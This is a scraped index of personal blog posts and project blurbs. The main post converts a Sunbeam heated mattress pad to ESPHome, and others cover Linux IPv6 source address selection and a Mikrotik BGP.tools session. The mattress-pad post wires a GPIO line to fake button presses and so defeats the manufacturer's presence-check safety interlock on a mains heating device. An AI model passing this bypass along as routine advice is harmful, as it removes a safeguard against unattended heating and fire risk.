This meant bypassing the physical button restriction. I also wanted to remove my reliance on the unofficial LocalTuya integration and use a native integration.\nEnter ESPHome, an open source firmware for embedded devices (primarily ESP32 chips, though others are supported) that integrates natively with Home Assistant.\nTuya Architecture Tuya devices use a two-part system: a main MCU handling device functionality and a separate chip managing WiFi/Bluetooth and cloud operations. These chips communicate via a UART serial protocol.\nThe mattress pad\u0026rsquo;s radio MCU is the WBR3. It contains an RTL8720CF chip and supports some third-party firmware through LibreTiny, but does not yet have native ESPHome support. This meant physically replacing the radio module with an ESPHome-compatible one would be required. While others have replaced Tuya radios before, each device presents unique challenges.\nFortunately, the ESP-12 has an almost identical pinout to the WBR3, making it a suitable replacement. Despite its name, the ESP-12 is actually an ESP8266 chip.\nInitial ESP-12 Flashing The bare ESP-12 lacks common dev-board features like a USB port, USB-to-Serial chip, boot button, or power regulator. Initial programming requires a specific wiring configuration to a serial adapter, though subsequent updates can be done wirelessly via OTA.\nHere\u0026rsquo;s the required wiring for the initial programming over UART:\n[ESP] [UART] TX ------ RX RX ------ TX EN ------ RTS GPIO0 ---- DTR GPIO15 --- GND GND ------ GND VCC ------ 3.3v GPIO15 needs to be pulled to ground for normal operations and for serial programming.
So I permanently bridged GPIO15 to the neighboring GND pin.\nAfter connecting the ESP-12 to my USB UART adapter, I flashed a basic minimal ESPHome configuration to enable network connectivity and OTA updates.\nAdding the ESP Radio Even though the ESP-12 is pin compatible with the WBR3 and could directly replace it, I decided to keep the original Tuya module just in case it was ever needed in the future, and more importantly, to remove the risk of breaking something in the desoldering process.\nTo disable the WBR3 without removing it, I grounded its EN (enable) pin, keeping the WBR3 permanently off and preventing conflicts with the ESP-12 when communicating over the now shared UART.\nI then connected the ESP-12 to the UART Tx, Rx, 3.3v, GND, and added a connection from GPIO5 to the presence button on the control panel.\nThe ESP-12 now effectively replaces the WBR3, handling all UART communication and drawing power from the WBR3\u0026rsquo;s voltage regulator. As a bonus, it can simulate physical button presses via the GPIO line, bypassing the presence check requirement.\nWarning The control unit has the low voltage negative/ground plane connected directly to mains neutral! While this “works”, it is considered unsafe and potentially dangerous. This effectively means that when the device is connected to mains AC power, mains current may be flowing through the low voltage components, even when off. Since voltage is relative, the low voltage components will work just fine as long as nothing else that is not expecting mains neutral on the ground plane connects to them! As a result, if you want to debug with UART, or flash the ESP, you MUST do it with the mains plug fully disconnected! I learned this the hard way. I fried a USB-UART adapter which did not appreciate the mains power surging through it. After this happened I mapped out the traces on the PCB to discover this design flaw. As long as mains power is connected, do not let anything external interact with the device!
Ever.\nFinally, I secured the new ESP-12 by hot-gluing it directly over the disabled WBR3.\nESPHome Configuration ESPHome includes a component for the Tuya UART protocol. I just needed to identify the correct data point numbers and types. Fortunately, these matched the data points already used by the LocalTuya integration, and are documented in this Home Assistant Community thread.\nTo automatically bypass the physical button requirement, I programmed ESPHome to toggle GPIO5, simulating a button press before activating the mattress pad. I also simplified the interface by replacing Tuya\u0026rsquo;s drop-down menus with more intuitive controls in Home Assistant, such as using a slider for heat levels instead of select menus.\nYou can view my ESPHome configuration below.\nCode Full ESPHome Config substitutions: node_name: mattress esphome: name: ${node_name} friendly_name: Mattress esp8266: board: esp12e # the board is a ESP-12F, but this is close enough wifi: ssid: !secret wifi_name password: !secret wifi_password ap: ssid: ${node_name} AP password: !secret hotspot_password # fallback mechanism for when connecting to the configured WiFi fails. 
captive_portal: # Enable Home Assistant API api: encryption: key: !secret api_encryption_key ota: - platform: esphome password: !secret ota_password time: - platform: homeassistant id: time_hass logger: baud_rate: 0 # (UART logging interferes with tuya) web_server: port: 80 include_internal: true status_led: pin: number: GPIO2 inverted: true uart: rx_pin: RX #GPIO3 tx_pin: TX #GPIO1 baud_rate: 9600 # https://esphome.io/components/tuya tuya: time_id: time_hass binary_sensor: - platform: status name: Status sensor: - platform: wifi_signal name: WiFi Signal update_interval: 10s filters: - throttle_average: 60s # node uptime sensor - platform: uptime name: Boot Time id: uptime_sensor icon: mdi:clock-start type: timestamp - platform: \u0026#34;tuya\u0026#34; name: Side A Auto Off Timer sensor_datapoint: 28 icon: mdi:timer-stop-outline entity_category: diagnostic unit_of_measurement: seconds - platform: \u0026#34;tuya\u0026#34; name: Side B Auto Off Timer sensor_datapoint: 29 icon: mdi:timer-stop-outline entity_category: diagnostic unit_of_measurement: seconds switch: # Master - platform: \u0026#34;tuya\u0026#34; id: master_power_sw switch_datapoint: 1 restore_mode: DISABLED internal: true on_turn_off: - switch.turn_off: master_preheat_sw - platform: template name: \u0026#34;Master Power\u0026#34; icon: mdi:car-seat-heater lambda: |- return id(master_power_sw).state; turn_on_action: - switch.turn_on: activity_btn - delay: 0.5s - switch.turn_on: master_power_sw turn_off_action: - switch.turn_off: master_power_sw - platform: \u0026#34;tuya\u0026#34; name: \u0026#34;Master Preheat Power\u0026#34; switch_datapoint: 8 icon: mdi:fire id: master_preheat_sw restore_mode: DISABLED # Side A - platform: \u0026#34;tuya\u0026#34; id: side_a_power_sw switch_datapoint: 14 restore_mode: DISABLED internal: true on_turn_off: - switch.turn_off: side_a_preheat_sw - platform: template name: \u0026#34;Side A Power\u0026#34; icon: mdi:car-seat-heater lambda: |- return 
id(side_a_power_sw).state; turn_on_action: - switch.turn_on: activity_btn - delay: 0.5s - switch.turn_on: side_a_power_sw turn_off_action: - switch.turn_off: side_a_power_sw - platform: \u0026#34;tuya\u0026#34; name: \u0026#34;Side A Preheat\u0026#34; switch_datapoint: 24 icon: mdi:fire restore_mode: DISABLED id: side_a_preheat_sw # Side B - platform: \u0026#34;tuya\u0026#34; id: side_b_power_sw switch_datapoint: 15 restore_mode: DISABLED internal: true on_turn_off: - switch.turn_off: side_b_preheat_sw - platform: template name: \u0026#34;Side B Power\u0026#34; icon: mdi:car-seat-heater lambda: |- return id(side_b_power_sw).state; turn_on_action: - switch.turn_on: activity_btn - delay: 0.5s - switch.turn_on: side_b_power_sw turn_off_action: - switch.turn_off: side_b_power_sw - platform: \u0026#34;tuya\u0026#34; name: \u0026#34;Side B Preheat\u0026#34; switch_datapoint: 25 icon: mdi:fire restore_mode: DISABLED id: side_b_preheat_sw - platform: gpio pin: number: GPIO5 inverted: true id: activity_btn name: \u0026#34;Activity Button\u0026#34; entity_category: diagnostic internal: true on_turn_on: - delay: 500ms - switch.turn_off: activity_btn number: - platform: template name: \u0026#34;Side A Level\u0026#34; id: side_a_level step: 1 min_value: 1 max_value: 10 update_interval: never entity_category: config icon: mdi:thermometer lambda: |- return std::stoi(id(side_a_level_int).state.substr(6)); set_action: then: - select.set: id: side_a_level_int option: !lambda return \u0026#34;Level \u0026#34; + std::to_string(int(x)); - platform: template name: \u0026#34;Side B Level\u0026#34; id: side_b_level step: 1 min_value: 1 max_value: 10 update_interval: never entity_category: config icon: mdi:thermometer lambda: |- return std::stoi(id(side_b_level_int).state.substr(6)); set_action: then: - select.set: id: side_b_level_int option: !lambda return \u0026#34;Level \u0026#34; + std::to_string(int(x)); - platform: template name: \u0026#34;Master Heat Level\u0026#34; id: 
master_level step: 1 min_value: 1 max_value: 10 update_interval: never entity_category: config icon: mdi:thermometer lambda: |- return std::stoi(id(master_level_int).state.substr(6)); set_action: then: - select.set: id: master_level_int option: !lambda return \u0026#34;Level \u0026#34; + std::to_string(int(x)); select: - platform: \u0026#34;tuya\u0026#34; entity_category: config id: master_level_int enum_datapoint: 4 internal: true options: 0: \u0026#34;Level 1\u0026#34; # L 1: \u0026#34;Level 2\u0026#34; 2: \u0026#34;Level 3\u0026#34; 3: \u0026#34;Level 4\u0026#34; 4: \u0026#34;Level 5\u0026#34; 5: \u0026#34;Level 6\u0026#34; 6: \u0026#34;Level 7\u0026#34; 7: \u0026#34;Level 8\u0026#34; 8: \u0026#34;Level 9\u0026#34; 9: \u0026#34;Level 10\u0026#34; # H on_value: then: - component.update: master_level - platform: \u0026#34;tuya\u0026#34; entity_category: config id: side_a_level_int enum_datapoint: 20 internal: true options: 0: \u0026#34;Level 1\u0026#34; # L 1: \u0026#34;Level 2\u0026#34; 2: \u0026#34;Level 3\u0026#34; 3: \u0026#34;Level 4\u0026#34; 4: \u0026#34;Level 5\u0026#34; 5: \u0026#34;Level 6\u0026#34; 6: \u0026#34;Level 7\u0026#34; 7: \u0026#34;Level 8\u0026#34; 8: \u0026#34;Level 9\u0026#34; 9: \u0026#34;Level 10\u0026#34; # H on_value: then: - component.update: side_a_level - platform: \u0026#34;tuya\u0026#34; entity_category: config id: side_b_level_int internal: true enum_datapoint: 21 options: 0: \u0026#34;Level 1\u0026#34; # L 1: \u0026#34;Level 2\u0026#34; 2: \u0026#34;Level 3\u0026#34; 3: \u0026#34;Level 4\u0026#34; 4: \u0026#34;Level 5\u0026#34; 5: \u0026#34;Level 6\u0026#34; 6: \u0026#34;Level 7\u0026#34; 7: \u0026#34;Level 8\u0026#34; 8: \u0026#34;Level 9\u0026#34; 9: \u0026#34;Level 10\u0026#34; # H on_value: then: - component.update: side_b_level - platform: \u0026#34;tuya\u0026#34; entity_category: config name: \u0026#34;Side A Set Timer\u0026#34; enum_datapoint: 26 icon: mdi:timer options: 0: 0.5 hours 1: 1 hour 2: 1.5 hours 3: 2 hours 4: 
2.5 hours 5: 3 hours 6: 3.5 hours 7: 4 hours 8: 4.5 hours 9: 5 hours 10: 5.5 hours 11: 6 hours 12: 6.5 hours 13: 7 hours 14: 7.5 hours 15: 8 hours 16: 8.5 hours 17: 9 hours 18: 9.5 hours 19: 10 hours 20: 24 hours - platform: \u0026#34;tuya\u0026#34; entity_category: config name: \u0026#34;Side B Set Timer\u0026#34; enum_datapoint: 27 icon: mdi:timer options: 0: 0.5 hours 1: 1 hour 2: 1.5 hours 3: 2 hours 4: 2.5 hours 5: 3 hours 6: 3.5 hours 7: 4 hours 8: 4.5 hours 9: 5 hours 10: 5.5 hours 11: 6 hours 12: 6.5 hours 13: 7 hours 14: 7.5 hours 15: 8 hours 16: 8.5 hours 17: 9 hours 18: 9.5 hours 19: 10 hours 20: 24 hours text_sensor: # version sensor - platform: version name: Firmware Version hide_timestamp: False id: version_txt # wifi info - platform: wifi_info ip_address: name: IP Address entity_category: diagnostic mac_address: name: MAC Address entity_category: diagnostic button: - platform: restart name: Restart id: restart_btn Home Assistant Dashboard I’ve made a Home Assistant dashboard for controlling the bed as well\ntype: custom:vertical-stack-in-card cards: - type: conditional conditions: - entity: switch.mattress_master_power state: \u0026#34;on\u0026#34; card: type: button show_name: true show_icon: true entity: switch.mattress_master_power icon: mdi:car-seat-heater show_state: true name: Bed Power - type: conditional conditions: - entity: switch.mattress_master_power state_not: \u0026#34;on\u0026#34; card: type: button show_name: true show_icon: true tap_action: action: call-service service: script.warm_bed service_data: {} target: {} icon: mdi:car-seat-heater show_state: true name: Preheat Bed - type: custom:collapsable-cards title: Details cards: - type: entities entities: - entity: switch.mattress_master_power name: Power icon: mdi:radiator - entity: number.mattress_master_heat_level name: Level - entity: switch.mattress_master_preheat_power name: Preheat icon: mdi:fire state_color: true show_header_toggle: false - type: custom:vertical-stack-in-card 
horizontal: true cards: - type: entities entities: - entity: switch.mattress_side_a_power name: A icon: mdi:radiator secondary_info: none - entity: number.mattress_side_a_level name: Level - entity: switch.mattress_side_a_preheat name: Preheat icon: mdi:fire - entity: select.mattress_side_a_set_timer name: Timer icon: mdi:clock-edit show_header_toggle: false state_color: true - type: entities entities: - entity: switch.mattress_side_b_power name: B icon: mdi:radiator secondary_info: none - entity: number.mattress_side_b_level name: Level - entity: switch.mattress_side_b_preheat name: Preheat icon: mdi:fire - entity: select.mattress_side_b_set_timer name: Timer icon: mdi:clock-edit show_header_toggle: false state_color: true ","permalink":"https://lanrat.com/posts/esphome-tuya-mattress-pad/","summary":"\u003cp\u003eThis post outlines the process to replace a \u003ca href=\"https://developer.tuya.com/en/docs/iot/wifi-module?id=Kaiuyi301kmk4\"\u003eTuya radio module\u003c/a\u003e with one running \u003ca href=\"https://esphome.io/\"\u003eESPHome\u003c/a\u003e to fully control a heated mattress pad locally with Home Assistant.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Sunbeam Heated Mattress Pad\" loading=\"lazy\" src=\"/posts/esphome-tuya-mattress-pad/images/sunbeam-heated-mattress-pad.webp\"\u003e\u003c/p\u003e\n\u003cp\u003eI purchased a \u003ca href=\"https://newellbrands.imgix.net/a9b10c44-e47f-3a72-b900-8cbc5bb36c2f/a9b10c44-e47f-3a72-b900-8cbc5bb36c2f.pdf\"\u003eSunbeam Heated Mattress Pad\u003c/a\u003e for those cold winter nights. The mattress pad controller connects to WiFi and has a remote control app. However, it has a safety feature that limits functionality. 
The app cannot turn the pad on unless you\u0026rsquo;ve recently pressed a physical button on the controller, effectively limiting the app to changing heat levels and turning the device off.\u003c/p\u003e","title":"Converting Sunbeam Heated Mattress Pad to ESPHome"},{"content":"GPM2Spotify History converts Google Play Music listening history data to Spotify-compatible JSON format. The Python scripts process HTML activity files exported from Google Play Music and generate structured JSON data that can be used with modern music tracking and analysis tools.\nThe conversion tool helps users migrate their historical listening data from the discontinued Google Play Music service to formats compatible with current music platforms and personal analytics tools. It parses activity HTML exports and transforms the data into standardized JSON structures for further processing.\n","permalink":"https://lanrat.com/projects/gpm2spotify-history/","summary":"\u003cp\u003eGPM2Spotify History converts Google Play Music listening history data to Spotify-compatible JSON format. The Python scripts process HTML activity files exported from Google Play Music and generate structured JSON data that can be used with modern music tracking and analysis tools.\u003c/p\u003e\n\u003cp\u003eThe conversion tool helps users migrate their historical listening data from the discontinued Google Play Music service to formats compatible with current music platforms and personal analytics tools. It parses activity HTML exports and transforms the data into standardized JSON structures for further processing.\u003c/p\u003e","title":"GPM2Spotify History"},{"content":"When creating a socket, unless manually specified, the OS will automatically determine the source address to use. However, the OS\u0026rsquo;s default choice may not always be desired. Source Address Selection allows for influencing the source address chosen by the OS.\nWhat is Source Address Selection?
When a host with multiple routable IP addresses sends a packet to another host, it needs to determine which of its local addresses to use as the source “from” address.\nHaving multiple routable local addresses was not very common with IPv4, but it is becoming increasingly common with IPv6, especially if there are multiple Router-Advertised subnets and SLAAC addresses bound to the same host, either on the same interface or different interfaces.\nRFC 6724 Rules Unless manually specified, the source address for a packet is determined by the host’s OS. The method for determining a source address is outlined in RFC 6724 and should be consistent across all platforms.\nBelow are the rules outlined in RFC 6724. The specifics of each rule are beyond the scope of this post. See the RFC for more details. Suffice it to say the defaults are good (ex: respond to traffic with the same IP it was sent to) but there are cases where you will want to override the defaults.\nPrefer same address. Prefer appropriate scope. Avoid deprecated addresses. Prefer home addresses. Prefer outgoing interface. Prefer matching label. Prefer privacy addresses. Use longest matching prefix. Why Override Source Address Selection? Why is this important if the routing table is correct and the defaults work?\nHere are a few examples:\nIf a host has multiple routable IP addresses and sends traffic to another host behind a firewall that only allows one source address through, the default source address selection should be overridden so that all traffic destined for the firewalled host uses the correct source address and is not blocked. If a host is on multiple networks, or dual-homed such as a router, with a statically routed IP or subnet, the host must ensure that any traffic destined to or from the statically routed IP/subnet uses the correct interface. Ex: You have a server with multiple uplinks and two IP addresses.
Your primary dynamically routed address is 5.5.5.5 and is routable from every interface, and your secondary address is 3.3.3.1 in the statically routed subnet 3.3.3.0/24, routable from only a single uplink. If the default source address selection outlined in RFC 6724 decides to use 3.3.3.1 as the default source address, your outgoing traffic may be sent from the statically routed source address to a peer/gateway that only accepts the dynamically routed address. This packet would likely be dropped on a well-configured network that implements BCP38 route filtering. Overriding source address selection in Linux Rule 6 “Prefer matching label” from the above source address selection rules can be influenced by a custom IP address label table. By adding to this table it is possible to influence the source address selected.\nThe address label table works as a simple lookup table. For each new outgoing connection the IP address label table is searched for the destination address to find a matching label. If there are multiple matches, the most specific match is used. Once found, the same table is then searched for all possible source addresses with a matching label. If one is found, that address is used as the source address.\nThe label values are numeric, but they have no ranking or purpose other than being a unique value to compare to other labels for equality. A label of 27 is not any more or less significant than a label of 42.\nTo view the current source address selection table, run: ip addrlabel list.\nExample:\n$ ip addrlabel list prefix ::1/128 label 0 prefix ::/96 label 3 prefix ::ffff:0.0.0.0/96 label 4 prefix 2001::/32 label 6 prefix 2001:10::/28 label 7 prefix 3ffe::/16 label 12 prefix 2002::/16 label 2 prefix fec0::/10 label 11 prefix fc00::/7 label 5 prefix ::/0 label 1 A new address label can be added to the table with:\nip addrlabel add prefix $PREFIX dev $IFACE label $LABEL The dev $IFACE portion is not required.
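The table lookup described above can be sketched in Python. This is a simplified model of the kernel's rule-6 behavior, not its actual implementation; the table below uses hypothetical documentation addresses, with a valid prefix standing in for a destination subnet.

```python
import ipaddress

def label_of(addr, table):
    """Longest-prefix match of addr against an addrlabel table,
    given as a list of (prefix, label) pairs."""
    ip = ipaddress.ip_address(addr)
    matches = [(ipaddress.ip_network(prefix), label)
               for prefix, label in table
               if ip in ipaddress.ip_network(prefix)]
    # the most specific (longest) matching prefix wins
    return max(matches, key=lambda m: m[0].prefixlen)[1]

def prefer_matching_label(dest, sources, table):
    """Rule 6: prefer source addresses whose label matches the destination's."""
    want = label_of(dest, table)
    preferred = [s for s in sources if label_of(s, table) == want]
    return preferred or sources

# hypothetical table using two arbitrary labels, 42 and 99
table = [
    ("2001:db8:cccc::/64", 42),  # destination subnet needing the alternate source
    ("2001:db8:bbbb::2", 42),    # alternate source address
    ("::/0", 99),                # default case
    ("2001:db8:aaaa::2", 99),    # default source address
]
print(prefer_matching_label("2001:db8:cccc::5",
                            ["2001:db8:aaaa::2", "2001:db8:bbbb::2"], table))
```

A destination inside the labeled subnet selects the source sharing label 42; any other destination falls through to the default label and the default source.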
But it is a good idea to be specific and force the label entry to a particular device.\nExample Let\u0026rsquo;s say you have a host with the IPv6 addresses 2001:0DB8:AAAA::2/64 and 2001:0DB8:BBBB::2/64. All traffic egressing from this host should use the source IP 2001:0DB8:AAAA::2 except traffic destined for anything in the subnet 2001:0DB8:FOO:BAR::/64, which should use 2001:0DB8:BBBB::2. This can be forced by adding the following IP address labels:\n# set the specific case with label 42 ip addrlabel add prefix 2001:0DB8:FOO:BAR::/64 label 42 ip addrlabel add prefix 2001:0DB8:BBBB::2 label 42 # set the default case with label 99 # The following are actually not needed but included for completeness. # the prior rules will take the addresses with label 42 out of # the pool of matching addresses using the default labels. ip addrlabel add prefix ::/0 label 99 ip addrlabel add prefix 2001:0DB8:AAAA::2 label 99 In this example the labels 99 and 42 are used, but they are arbitrary and can be any number not already in use by an existing address label.\nExclude an Address from the List of Possible Defaults to Select Sometimes a system may have multiple addresses, and you may just want to exclude an address from the list of possible defaults for the OS to choose from. For this particular case you only need to add the address to the address label table with a label that is not already in use.\nSince the address will not have any other matching addresses or networks in the table with the same label, it won\u0026rsquo;t match anything, and any other address will take precedence.\nThe following can be used to remove the address 2001:0DB8:BBBB::2 from the host\u0026rsquo;s default address selection if we want all traffic to use another source address (assuming no other rules change this):\nip addrlabel add prefix 2001:0DB8:BBBB::2 label 32 Set Address Labels at Boot in Debian Once the address labels are added, they will take effect immediately.
However, they are not persistent and will be lost on reboot. On Debian-based systems a post-up hook can be used to add the rule automatically once the parent interface is brought online. Rules associated with an interface are automatically removed when that interface disappears.\nIn /etc/network/interfaces or /etc/network/interfaces.d/INTERFACE_CONFIG if you have a per-interface config, set your ip addrlabel add ... command in the post-up section of the stanza for the desired interface. The variable $IFACE can be used as a placeholder for the current interface name.\nExample:\niface eno1 inet6 static address 2001:0DB8:AAAA::2/64 gateway 2001:0DB8:AAAA::1 iface eno1 inet6 static address 2001:0DB8:BBBB::2/64 #set high label (42) to not conflict with existing label post-up ip addrlabel add prefix 2001:0DB8:BBBB::0/64 dev $IFACE label 42 || true post-up ip addrlabel add prefix 2001:0DB8:FOO:BAR::/64 dev $IFACE label 42 || true In this example no address labels are set for the desired default source address 2001:0DB8:AAAA::2. This still works because the non-default source address now has a non-default label, causing it to not be selected for outgoing traffic by default unless another rule matches the address label.\nThe post-up commands end in || true so that they always return with a 0 exit code. If the command were to fail and return a non-zero exit code, the interface may not finish being brought up by the OS. If this is a server, it is far more important for some of the network to be brought online so that it can be accessed (and fixed) remotely than for the host to take itself offline.
Adding an address label that already exists will cause an error exit code, but since the label is already in place, the error is safe to ignore.\nMore Information IPv6 Source Address Selection – what, why, how Controlling IPv6 source address selection ip-addrlabel - Linux manual page Address Resolver \u0026amp; Selection ","permalink":"https://lanrat.com/posts/linux-src-ip-selection/","summary":"\u003cp\u003eWhen creating a socket, unless manually specified, the OS will automatically determine the source address to use. However, the OS\u0026rsquo;s default choice may not always be desired. Source Address Selection allows for influencing the source address chosen by the OS.\u003c/p\u003e\n\u003ch2 id=\"what-is-source-address-selection\"\u003eWhat is Source Address Selection?\u003c/h2\u003e\n\u003cp\u003eWhen a host with multiple routable IP addresses sends a packet to another host, it needs to determine which of its local addresses to use as the source “from” address.\u003c/p\u003e","title":"Influencing Linux IP Source Address Selection"},{"content":"Scroller is a web application that displays customizable scrolling text messages in fullscreen mode. The single-page application allows users to configure text content, fonts, colors, scroll speed, and background themes before launching a fullscreen display.\nThe application includes URL hash-based message saving, automatic text scaling to fit screens, and responsive design with light/dark mode support. It\u0026rsquo;s designed for creating dynamic text displays for presentations, signage, or any scenario requiring large-scale scrolling text output.\n","permalink":"https://lanrat.com/projects/scroller/","summary":"\u003cp\u003eScroller is a web application that displays customizable scrolling text messages in fullscreen mode.
The single-page application allows users to configure text content, fonts, colors, scroll speed, and background themes before launching a fullscreen display.\u003c/p\u003e\n\u003cp\u003eThe application includes URL hash-based message saving, automatic text scaling to fit screens, and responsive design with light/dark mode support. It\u0026rsquo;s designed for creating dynamic text displays for presentations, signage, or any scenario requiring large-scale scrolling text output.\u003c/p\u003e","title":"Scroller"},{"content":"Caddy Signal Proxy implements a Signal TLS proxy using the Caddy web server and the caddy-l4 plugin. The configuration enables Signal messaging clients to connect through a TLS proxy for improved privacy or to bypass network restrictions.\nThe deployment uses Docker Compose with a minimal configuration that can be integrated into existing Caddy setups. The proxy handles TLS termination and forwarding for Signal\u0026rsquo;s messaging infrastructure, requiring only a domain name configuration to operate.\n","permalink":"https://lanrat.com/projects/caddy-signal-proxy/","summary":"\u003cp\u003eCaddy Signal Proxy implements a Signal TLS proxy using the Caddy web server and the caddy-l4 plugin. The configuration enables Signal messaging clients to connect through a TLS proxy for improved privacy or to bypass network restrictions.\u003c/p\u003e\n\u003cp\u003eThe deployment uses Docker Compose with a minimal configuration that can be integrated into existing Caddy setups. The proxy handles TLS termination and forwarding for Signal\u0026rsquo;s messaging infrastructure, requiring only a domain name configuration to operate.\u003c/p\u003e","title":"Caddy Signal Proxy"},{"content":"When running a network with its own ASN, you will likely end up spending some time working with BGP. Knowing how your peer networks connect can help with your own network planning. 
BGP.Tools is a service that maps out different networks and the routes between them by having networks opt in to provide bgp.tools with a BGP session sharing their exportable routes.\nThis guide will walk you through setting up a BGP.Tools session with a Mikrotik router running RouterOS 7.\nBGP Tools Setup After logging into your BGP.Tools account, visit the manage peering page and create a new session.\nFill in a name for this BGP session, your AS number, and your router’s IP.\nSelect “Create Session” and make a note of the remote peering IP and AS number.\nMikrotik RouterOS Setup Route Filters Before creating the session, create route filters to prevent any unexpected routes from being exchanged. BGP.Tools should never send you routes from this session, but it’s best to explicitly tell your router to reject all incoming routes just to be safe. Similarly, you don’t want to send bgp.tools blackhole routes either.\n/routing filter rule add chain=reject comment=reject disabled=no rule=reject add chain=bgp.tools-out disabled=no rule=\u0026#34;if (blackhole) {reject}\u0026#34; add chain=bgp.tools-out disabled=no rule=accept BGP Session Now add the BGP session with bgp.tools.\nAt this time Mikrotik’s BGP implementation does not support addPath, so only your router’s currently active routes will be sent to bgp.tools.\nUnlike a normal BGP session, be sure to select both the ip and ipv6 address families, and enable multihop since this BGP session will be over the Internet and not a LAN.\nBe sure to change the examples to use your ASN and IP.\n/routing bgp connection add add-path-out=all address-families=ip,ipv6 as=64496 \\ disabled=no input.affinity=instance .filter=reject \\ local.address=198.51.100.1 .role=ebgp-provider multihop=yes \\ name=bgp.tools output.affinity=input .filter-chain=\\ bgp.tools-out .redistribute=bgp remote.address=\\ 185.230.223.77/32 .as=212232 router-id=198.51.100.1 \\ routing-table=main Save and enable the session once done.\nBGP Tools Results Once
the session is enabled and active, you should see it listed on your bgp.tools account home page.\nAnd when you view your AS page you should see Direct Feed added to your ASN’s tags. For example, here is mine.\nNow that you send BGP.Tools a BGP feed, your network’s information will be more accurate and you can use other features such as the Looking Glass!\n","permalink":"https://lanrat.com/posts/mikrotik-bgp-tools/","summary":"\u003cp\u003eWhen running a network with its own ASN, you will likely end up spending some time working with \u003ca href=\"https://en.wikipedia.org/wiki/Border_Gateway_Protocol\"\u003eBGP\u003c/a\u003e. Knowing how your peer networks connect can help with your own network planning. \u003ca href=\"https://bgp.tools\"\u003eBGP.Tools\u003c/a\u003e is a service that maps out different networks and the routes between them by having networks opt to provide bgp.tools with a BGP session sharing their exportable routes.\u003c/p\u003e\n\u003cp\u003eThis guide will walk you through setting up a \u003ca href=\"https://bgp.tools\"\u003eBGP.Tools\u003c/a\u003e session with a Mikrotik router running RouterOS 7.\u003c/p\u003e","title":"Creating a Mikrotik BGP.Tools Session"},{"content":"Portquiz tests outbound TCP and UDP connectivity to remote hosts by attempting connections across specified port ranges. The tool identifies which ports can successfully establish connections through network infrastructure such as firewalls, NAT devices, and proxies.\nThe program can detect deep packet inspection (DPI) filtering and other network-level blocking mechanisms. It supports testing individual ports or scanning complete port ranges, with cross-platform compatibility across Windows, macOS, and Linux systems.\n","permalink":"https://lanrat.com/projects/portquiz/","summary":"\u003cp\u003ePortquiz tests outbound TCP and UDP connectivity to remote hosts by attempting connections across specified port ranges. 
The tool identifies which ports can successfully establish connections through network infrastructure such as firewalls, NAT devices, and proxies.\u003c/p\u003e\n\u003cp\u003eThe program can detect deep packet inspection (DPI) filtering and other network-level blocking mechanisms. It supports testing individual ports or scanning complete port ranges, with cross-platform compatibility across Windows, macOS, and Linux systems.\u003c/p\u003e","title":"Portquiz"},{"content":"Caddy Dynamic RemoteIP is a Caddy web server module that provides dynamic IP address matching capabilities. The module implements the http.matchers.dynamic_remote_ip matcher, which allows matching requests based on remote IP addresses that are dynamically sourced from configurable modules.\nUnlike static IP matching, this module enables real-time IP range updates through pluggable IPRangeSource implementations. This is useful for scenarios requiring dynamic access control based on changing IP ranges, such as cloud provider IP lists or threat intelligence feeds.\n","permalink":"https://lanrat.com/projects/caddy-dynamic-remoteip/","summary":"\u003cp\u003eCaddy Dynamic RemoteIP is a Caddy web server module that provides dynamic IP address matching capabilities. The module implements the http.matchers.dynamic_remote_ip matcher, which allows matching requests based on remote IP addresses that are dynamically sourced from configurable modules.\u003c/p\u003e\n\u003cp\u003eUnlike static IP matching, this module enables real-time IP range updates through pluggable IPRangeSource implementations. This is useful for scenarios requiring dynamic access control based on changing IP ranges, such as cloud provider IP lists or threat intelligence feeds.\u003c/p\u003e","title":"Caddy Dynamic RemoteIP"},{"content":"TOOR.sh is a cloud and VM hosting service operated by ToorCon, a 501c3 non-profit organization that provides free hosting resources for security research and public benefit projects. 
The service includes dedicated servers for VMs, storage, and databases, along with their own ISP infrastructure (AS22296).\nThe platform offers various free tools including IP address lookup services, network speed tests, and internet infrastructure services such as RIPE Atlas probes, BGP feeds, Tor nodes, and Signal TLS proxies. TOOR.sh operates on a volunteer basis with a \u0026ldquo;best effort SLA\u0026rdquo; and accepts donations of hardware, network resources, or funds to support their mission.\n","permalink":"https://lanrat.com/projects/toor.sh/","summary":"\u003cp\u003eTOOR.sh is a cloud and VM hosting service operated by ToorCon, a 501c3 non-profit organization that provides free hosting resources for security research and public benefit projects. The service includes dedicated servers for VMs, storage, and databases, along with their own ISP infrastructure (AS22296).\u003c/p\u003e\n\u003cp\u003eThe platform offers various free tools including IP address lookup services, network speed tests, and internet infrastructure services such as RIPE Atlas probes, BGP feeds, Tor nodes, and Signal TLS proxies. TOOR.sh operates on a volunteer basis with a \u0026ldquo;best effort SLA\u0026rdquo; and accepts donations of hardware, network resources, or funds to support their mission.\u003c/p\u003e","title":"TOOR.sh"},{"content":"WebSerial Bruteforce automatically determines the correct baud rate for UART serial devices by testing common communication speeds and analyzing the returned data. The web application uses the WebSerial API to connect directly to serial devices from the browser without requiring additional software.\nThe tool iterates through standard baud rates and measures the amount of ASCII data returned at each setting, selecting the configuration that produces the most readable output. 
This is useful for reverse engineering or troubleshooting unknown serial devices where the communication parameters are not documented.\n","permalink":"https://lanrat.com/projects/webserial-bruteforce/","summary":"\u003cp\u003eWebSerial Bruteforce automatically determines the correct baud rate for UART serial devices by testing common communication speeds and analyzing the returned data. The web application uses the WebSerial API to connect directly to serial devices from the browser without requiring additional software.\u003c/p\u003e\n\u003cp\u003eThe tool iterates through standard baud rates and measures the amount of ASCII data returned at each setting, selecting the configuration that produces the most readable output. This is useful for reverse engineering or troubleshooting unknown serial devices where the communication parameters are not documented.\u003c/p\u003e","title":"WebSerial Bruteforce"},{"content":"USB Meter is a web application that connects to Atorch power meters via WebBluetooth to log and display electrical measurements. The application reads real-time data including voltage, current, power, energy, capacity, resistance, and temperature from compatible Atorch USB power meters.\nThe web interface provides data logging capabilities with the ability to reset, pause, and save measurement sessions. Using WebBluetooth API, the application eliminates the need for additional software installations, operating directly in compatible web browsers with Bluetooth support.\n","permalink":"https://lanrat.com/projects/usb-meter/","summary":"\u003cp\u003eUSB Meter is a web application that connects to Atorch power meters via WebBluetooth to log and display electrical measurements. 
